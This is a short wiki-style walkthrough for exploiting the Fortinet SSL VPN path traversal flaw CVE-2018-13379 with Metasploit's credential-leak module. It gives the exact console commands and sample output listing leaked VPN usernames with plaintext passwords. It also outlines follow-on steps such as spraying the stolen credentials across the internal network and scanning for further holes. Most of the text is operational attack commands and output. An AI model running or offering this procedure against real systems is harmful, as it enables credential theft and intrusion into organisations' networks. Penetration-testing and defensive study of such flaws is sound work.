Fortinet SSL VPN Path Traversal
Jump to navigation
Jump to search
Exploiting CVE-2018-13379 Forti SSL VPN
Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:
- Look for Bookmarks in the VPN console which have internal address and credentials already saved
- Connect to the Forti VPN client locally (Windows server via RDP) and scan the LAN for systems and then spray the VPN credentials as explained here
- Scan the LAN for vulnerabilities which we can exploit to gain further access into the network
To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.
Start the database and run it:
- sudo systemctl start postgresql
- msfdb init
Start msfconsole:
user@host:~$ msfconsole StArting the Metasploit Framework console...
Use module:
msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
Set your targets:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt RHOSTS => file:targets.txt
Run the exploit module!
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run [*] https://10.10.10.11:10443 - Trying to connect. [+] https://10.10.10.11:10443 - Vulnerable!
View the credentials:
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 10.10.10.11 10.10.10.11 10443/tcp (https) admin 8401327 Password 10.10.10.12 10.10.10.12 10443/tcp (https) cvilleneuve 3264012 Password 10.10.10.13 10.10.10.13 10443/tcp (https) vdujardin Jouv2018$ Password 10.10.10.14 10.10.10.14 10443/tcp (https) montechti Thomas2005 Password 10.10.10.15 10.10.10.15 10443/tcp (https) hvac Winter2022 Password